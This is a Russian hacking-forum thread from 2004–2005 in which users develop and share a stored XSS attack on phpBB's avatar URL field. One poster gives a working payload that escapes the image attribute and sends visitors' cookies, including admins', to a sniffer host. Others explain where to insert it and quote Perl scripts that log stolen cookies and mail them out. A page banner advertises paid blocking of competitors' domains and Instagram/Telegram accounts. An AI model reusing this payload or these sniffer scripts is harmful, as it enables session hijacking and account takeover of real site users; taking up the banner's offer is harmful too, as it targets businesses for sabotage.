Форум АНТИЧАТ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
XSS в phpBB

Страница 1 из 4

Опции темы

Поиск в этой теме

Опции просмотра

XSS в phpBB

27.12.2004, 10:58

zFlex

Новичок

Регистрация: 26.12.2004

Сообщений: 5

Провел на форуме:
0

Репутация: 0

Отправить сообщение для zFlex с помощью ICQ

XSS в phpBB

йопт!! запарился уже... мож потому и не могу решить проблему, что она слишком легкая

Короче так, на форуме phpBB есть возможность вставлять аватар со своего url , решил проверить на дырочку, и вписал туда javascript:alert();
в ответ получил:
<img src="javascript:alert();" alt="" border="0" />
идем дальше...
решил проверить на окончание *.jpg , вписав x.jpg и получил:
<img src="x.jpg" alt="" border="0" />
затем проверил вписав x.ru x=`x.jpg получил:
<img src="x.ru x=`x.jpg" alt="" border="0" />
и т.п.
Вопрос вот в чем: пишу вместо картинки снифер (http://antichat.ru/cgi-bin/s.jpg) и он прекрасно его ловит, однаком не нужны куки всех, у кого грузится страница с моим аватором, все перепробовал, но нифига не получается

Помогите плзз...

28.12.2004, 00:21

Algol

Регистрация: 29.05.2002

Сообщений: 1,793

Провел на форуме:
2050916

Репутация: 0

Приведи код, который ты вставляешь в форум.

28.12.2004, 08:16

zFlex

Новичок

Регистрация: 26.12.2004

Сообщений: 5

Провел на форуме:
0

Репутация: 0

поэтому и спрашиваю, как код оформить?? Дело в том, что форум съедает любые варианты, т.е. что бы не писалось в поле ссылки на аватар - все будет отображаться как картинка, например:
пишем в поле bla-bla-bla
получится <img src="bla-bla-bla" alt="" border="0" />
пишем javascript:alert(document.cookie)
и при загрузки страницы нам открывается alert окно в котором наши куки, а в html-тегах видим <img src="javascript:alert(document.cookie)" alt="" border="0" />
Словом, все, что бы Мы не писали в графе аватара, форум будет съедать как картинку <img src="наш текст">
Вот Я и спрашиваю, как мне вместо отображения document.cookie у юзера отдать запрос сниферу, что бы он их словил, а у юзера ни чего не отображалось?? Многое пререпробовал, но результат один и тот же - снифер ловит opener.location (url на котором находится юзер), то бишь адрес, откуда был вызван снифер, а не document.cookie - его куки...
Потенциальная дырка есть, но ее нужно оформить!! Есть идеи?!

29.12.2004, 11:34

zFlex

Новичок

Регистрация: 26.12.2004

Сообщений: 5

Провел на форуме:
0

Репутация: 0

Ура-а-а-а-а-а!!!!!! Решение найдено!!

Последний раз редактировалось zFlex; 13.01.2005 в 23:46..

30.12.2004, 08:24

zFlex

Новичок

Регистрация: 26.12.2004

Сообщений: 5

Провел на форуме:
0

Репутация: 0

Короче так...

Есть в phpBB такая хреновина, как аватар и там нет фильтра на спец символы, а это нам позволяет делать все, что вздумается

Инфы об этом XSS ни где не встречал, поэтому можно считать новой

XSS такой:
http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
где [target] - url на реальную картинку
localhost - url снифера

В ответ от сервера получаем в html-тегах:
<img src="http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)" alt="" border="0" />

таким образом грузится картинка, не доставляющая жертве (ею может быть админ) ни каких неудобств, в то время как его куки уходят к сниферу

з.ы. кто первый - тот и пускай пишет ролик для видео.античат.ру , тока просьба указать, что эту ни кому не приметную багу нашел zFlex.
С ув., Йа ))

13.01.2005, 00:17

alien51

Новичок

Регистрация: 13.01.2005

Сообщений: 4

Провел на форуме:
0

Репутация: 0

Мля мля неработает ...

Цитата:

http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)

Как именно вставить в сообщение на форуме эту штуку ??

13.01.2005, 00:41

>>ElvI$<<

Познающий

Регистрация: 12.01.2005

Сообщений: 42

Провел на форуме:
36241

Репутация: 1

Отправить сообщение для >>ElvI$<< с помощью ICQ

Блин,ты че глупый,какой нафиг сообщение в форуме...это вставляется в АФАТАР!!!т.е. когда регаешься или редактируешь свой акк,там пишешь,где url: http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)?

P.s.: я могу написать видео...

13.01.2005, 01:15

>>ElvI$<<

Познающий

Регистрация: 12.01.2005

Сообщений: 42

Провел на форуме:
36241

Репутация: 1

Обломчик,на большенстве серверов стоит блок 8)

13.01.2005, 02:02

alien51

Новичок

Регистрация: 13.01.2005

Сообщений: 4

Провел на форуме:
0

Репутация: 0

Цитата:

Сообщение от >>ElvI$<<

А где скрипт взять, который записывал бы их в отдельное файло ? У меня есть но они неканают или я чё то неправельно делаю....

Цитата:

#!/usr/bin/perl -w
#
open cOOKIES,"cookies.txt";
print "Conter-Type:text/html\n\n\";
#
#
print COOKIES "-------------new cookie----------\n";
#
#
#
print COOKIES "$ENV{'QERY_STRING'}\n';
#
print COOKIES "---------end of cookie------------"\n\n";
#
close COOKIES;

и ещё

Цитата:

#!/usr/bin/perl
use CGI qw(:standard);
$cookie=$ENV{QUERY_STRING};
$file="cookies.txt"; //???? ??????????? ????
open FILE, ">>$file";
print FILE "$cookie\n\n";
close FILE;
$query = CGI::new();
print $query->redirect('http://www.musthave.ru');
$mailprog = '/usr/sbin/sendmail';
$mail='xaker@xaker.ru'; //??? ???????? ???? ???? ? ????????? ??? ???????
$target='pass@admina.net';
open MAIL, "|mailprog -t";
print MAIL "Content-Type: text/plain\n";
print MAIL "Subject: new cookies\n";
print MAIL "To: $mail\n";
print MAIL "From: .$target\n\n";
print MAIL "$cookie";
close MAIL;

Дак вот как привельно составить эту строчку и почему у меня это дело всё неработает ... ваще Шляпа какая то :|